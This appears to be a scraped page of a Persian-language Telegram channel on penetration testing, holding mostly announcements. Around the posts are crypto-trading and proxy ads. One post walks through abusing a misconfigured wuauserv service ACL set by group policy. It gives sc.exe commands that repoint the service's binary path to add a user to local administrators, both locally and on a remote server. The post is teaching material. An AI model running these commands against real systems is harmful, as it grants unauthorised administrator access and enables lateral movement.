Try Hack Box

Description
1 Nov 2020

1399/08/11

Learn penetration testing
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @Unique_exploitBot
Advertising
We recommend to visit

ترید شاهین 💸 | 🕋𝐈𝐍 𝐆𝐎𝐃 𝐖𝐄 𝐓𝐑𝐔𝐒𝐓
آموزش صفر تا 100 کریپتو 📊
❗️معرفی خفن ترین پروژه ها‌ در بازار های مالی به صورت رایگان🐳
سیگنال فیوچرز و اسپات (هولد) رایگان🔥
با ما باشی💯 قدم جلویی رفیق🥂
𝐈𝐍𝐒𝐓𝐀𝐆𝐑𝐀𝐌 :
www.instagram.com/trade_shahin

Last updated 5 days, 18 hours ago

[ We are not the first, we try to be the best ]

Last updated 1 month, 1 week ago

FAST MTPROTO PROXIES FOR TELEGRAM

Ads : @IR_proxi_sale

Last updated 3 weeks, 2 days ago

1 week, 1 day ago

هنری که با خرد همراه نباشد، همچو مرگی که است که بر تن چیره گشته…
«برگرفته از اندرزنامه پهلویِ دستور آذرباد ماراسپندان»
@TryHackBox

1 week, 1 day ago

کانال هایی که ممکن است مفید باشه واستون

@TryHackBoxOfficial ( نقشه راه )
@TryHackBoxStory ( داستان های هک )
@PfkCtf (رایت اپ و مقالات و .. ctf)
@Pfksecurity (بدافزار ، اکسپلویت ، اسکادا )

1 week, 1 day ago

از امروز شروع کردم به اماده سازی یکی از دوره های sans احتمالا کتابشو به زودی بزارم ..
منتظر باشید شاید تا اون موقع پستی نزارم

1 week, 4 days ago

دوستان به زودی فعالیتمون در یوتیوب شروع میشه خوشحال میشم حمایتمون کنید به زودی ...
فعالیتمون در یوتیوب مباحث تست نفوذ شبکه هست

1 week, 4 days ago

عزیزان اگر مایل بودید میتونید داستان خود را که چگونه وارد این حوزه شدید رو بفرستید برای ما و ما در کانال به اشتراک بگذاریم اینکه چه راهایی رفتید چه چیزی باعث شد سمت این حوزه بیاد و چالش هایی که برخوردید و و و .

درصورت رضایت توی کانال قرار خواهد گرفت

ارتباط :
@TryHackBoxStorybot

1 week, 6 days ago

درود خدمت دوستان گرامی ، ما قصد داریم کتاب Security + را ترجمه کنیم و ویرایش هایی بدیم و مطالبی رو بهش اضافه کنیم و به زبان فارسی در اختیار شما دوستان قرار بدهیم .

اگر دوست داشتید به ما کمک کنید پیام بدهید .
شاید بپرسید مزایا چیست ؟
ما یک نسخه رایگان از کتاب که نکاتی هم اضافه میکنیم برای شما کتاب به طور رایگان ارسال میشه
@Unique_exploitBot

2 weeks ago

پیکربندی ناامن ACL های سرویس از طریق group policies

سیاست های گروه ابزار محبوبی برای مدیریت متمرکز زیرساخت های مبتنی بر Active Directory هستند. ابزار Group3r به شما امکان می دهد اطلاعاتی را از سیاست های گروه برای تجزیه و تحلیل بعدی جمع آوری کنید. Group3r همچنین برخی از تنظیمات نادرست را برجسته می کند، بنابراین جستجو با استفاده از کلمات کلیدی red و black برای شناسایی مهم ترین نقص ها راحت است. پست امروز درباره پیکربندی ناامن ACL های سرویس از طریق گروپ پالیسی است.

پس از راه اندازی Group3r و بررسی نتایج، خطوط زیر را یافتیم:
A Windows service's ACL is being configured to grant abusable permissions to a target trustee. This should allow local privilege escalation on affected hosts. Service: wuauserv, Trustee: Authenticated Users \- S\-1\-5\-11 .
اگر به خود Group Policy بروید، نام سرویس، نوع راه اندازی و تنظیمات حقوق دسترسی را در قالب یک رشته SSDL پیدا می کنیم:
"wuauserv",4,"D:AR(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)(A;;CCLCSWLOCRRC;;;IU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
ما فقط به گروه AU علاقه مندیم:

- CC -
حقوق درخواست پیکربندی سرویس.
- DC -
حقوق تغییر سرویس.
- LC -
حقوق درخواست وضعیت سرویس ها؛
- SW -
حقوق فهرست کردن تمام خدمات وابسته به سرویس
- RP - حقوق شروع سرویس؛
- WP - حقوق توقف سرویس؛
- DT - حقوق توقف سرویس.
- LO – حقوقی که به شما امکان می دهد از سرویس بخواهید فورا وضعیت شما را گزارش کند.
- CR - حقوق تعیین کد کاربر عنصر کنترل.
- RC - حقوق خواندن توصیفگرهای امنیتی.

ابتدا باید تعیین کنید که این خط مشی گروه روی کدام کامپیوترها اعمال می شود.

MATCH(g:GPO {name:"[email protected]"})\-[:GPLink|Contains*1..]\->(c:Computer) RETURN c.name

اگر میزبان فعلی ما یا میزبانی که به آن دسترسی راه دور داریم این خط مشی را اعمال می کند، پیکربندی سرویس فعلی را در رایانه محلی پرس و جو می کنیم:

sc.exe qc wuauserv

ما مقدار فعلی پارامتر BINARY_PATH_NAME را برای بازیابی بعدی ذخیره می کنیم.
ما پارامتر BINARY_PATH_NAME را به کاری که می‌خواهیم در رایانه انجام دهیم تغییر می‌دهیم، برای مثال، خود را به گروه مدیران لوکال یا local administrators اضافه می‌کنیم.

sc.exe config wuauserv binPath= "net.exe localgroup administrators victim /add"

سرویس را شروع کنید:

sc.exe start wuauserv

اگر سرویس راه اندازی شده است، ابتدا باید آن را متوقف کنید و سپس آن را شروع کنید:

sc.exe stop wuauserv sc.exe start wuauserv

در حالی که Group3r گزارش می دهد که این نقص می تواند برای افزایش دسترسی لوکال استفاده شود، در برخی موارد می توان از آن برای افزایش دسترسی از راه دور و lateral movement نیز استفاده کرد.

ما یک بررسی ساده انجام می دهیم، مانند راه اندازی یا نصب یک سرویس در یک میزبان راه دور:

sc.exe \\server start wuauserv

اگر خطای Access Denied ظاهر نشد، بیایید سعی کنیم خود را به گروه مدیران لوکال اضافه کنیم و سرویس را راه اندازی کنیم:

sc.exe \\server config wuauserv binPath= "net.exe localgroup administrators victim /add" sc.exe \\server start wuauserv

پس از به دست آوردن دسترسی  local administrator، پارامتر BINARY_PATH_NAME را به حالت اولیه خود برگردانید.

#RedTeam #PurpleTeam #LPE
@TryHackBox

2 weeks, 2 days ago

Hacking with PowerShell

اصول اولیه PowerShell و PowerShell Scripting را بیاموزید.
#powershell
@TryHackBox

2 weeks, 5 days ago

Printer Hacking 101

با هک چاپگر آشنا شوید و با آن آشنا شوید و اصول اولیه IPP را بدانید.
#PrinterHacking
@TryHackBox

We recommend to visit

ترید شاهین 💸 | 🕋𝐈𝐍 𝐆𝐎𝐃 𝐖𝐄 𝐓𝐑𝐔𝐒𝐓
آموزش صفر تا 100 کریپتو 📊
❗️معرفی خفن ترین پروژه ها‌ در بازار های مالی به صورت رایگان🐳
سیگنال فیوچرز و اسپات (هولد) رایگان🔥
با ما باشی💯 قدم جلویی رفیق🥂
𝐈𝐍𝐒𝐓𝐀𝐆𝐑𝐀𝐌 :
www.instagram.com/trade_shahin

Last updated 5 days, 18 hours ago

[ We are not the first, we try to be the best ]

Last updated 1 month, 1 week ago

FAST MTPROTO PROXIES FOR TELEGRAM

Ads : @IR_proxi_sale

Last updated 3 weeks, 2 days ago